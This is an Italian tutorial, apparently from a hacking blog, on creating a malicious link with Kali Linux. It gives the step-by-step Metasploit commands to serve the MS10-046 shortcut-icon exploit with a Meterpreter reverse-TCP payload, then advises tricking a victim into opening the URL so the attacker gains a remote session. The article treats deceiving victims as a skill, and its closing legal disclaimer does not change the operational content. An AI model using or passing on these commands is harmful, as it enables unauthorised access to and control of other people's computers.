Fino ad ora abbiamo discusso su vari metodi per creare backdoor, ma oggi andremo a vedere come generare un link maligno con Kali Linux; si tratta di un nuovo metodo che fino ad adesso non ne abbiamo parlato; esso consiste nel generale un codice maligno con Kali per poi farci cliccare sopra la vittima, che senza saperlo andrà ad aprire una comunicazione tra il suo computer e quello dell’attaccante. La backdoor non deve essere per forza un file, ma il più delle volte gli hacker (quelli più esperti) la camuffano molto bene e ce la fanno apparire come un link (nel nostro caso) o in altri modi molti ingegnosi. La probabilità di successo sta proprio nel saper studiare e progettare al meglio la dinamica dell’attacco, aggirando gli ostacoli con un pizzico di intelligenza e soprattutto di furbizia; se seguiamo questi suggerimenti riusciremo ad ottenere quasi sempre ciò che vogliamo. Ma ora passiamo al punto del giorno; come possiamo dar vita ad un link che, appena aperto, va a creare una backdoor in un PC remoto? Vi rispondo subito alla domanda, è abbastanza semplice; basta usufruire del nostro consueto sistema operativo per l’hacking e il cracking, ovvero Kali Linux e con qualche comando arriveremo a ciò di cui abbiamo bisogno. Senza perdere altro tempo, cominciamo!

Innanzitutto iniziamo aprendo un terminale digitando il comando “msfconsole” che andrà ad attivare la console di Metasploit Framework, che come avete avuto modo di vedere è uno dei principali tool che utilizziamo.

Generare un link maligno con Kali Linux

 

 

 

 

 

 

Quindi procediamo con una serie di comandi:

-use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Generare un link maligno con Kali Linux

 

 

 

 

 

 

-set PAYLOAD windows/meterpreter/reverse_tcp

Generare un link maligno con Kali Linux

 

 

 

 

 

 

-set LHOST “indirizzo IP locale”

Generare un link maligno con Kali Linux

 

 

 

 

 

 

-set LPORT “porta locale”

Generare un link maligno con Kali Linux

 

 

 

 

 

 

-set SRVHOST “indirizzo IP locale”

Generare un link maligno con Kali Linux

 

 

 

 

 

 

-exploit

Generare un link maligno con Kali Linux

 

 

 

 

 

 

A questo punto il terminale vi indicherà i prossimi procedimenti da eseguire; in questo caso, dopo che ho digitato il comando “exploit”, mi compare nella terzultima riga la seguente dicitura: “Using URL: https://192.168.1.100:80/”; semplicemente dovremo copiare questo link e farlo aprire in qualche modo alla vittima; appena aperto si stabilirà una comunicazione tra il nostro computer e quello target.

Generare un link maligno con Kali Linux

 

 

 

 

 

 

Per qualsiasi chiarimento sui comandi a disposizione potete digitare nel terminale “help”.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).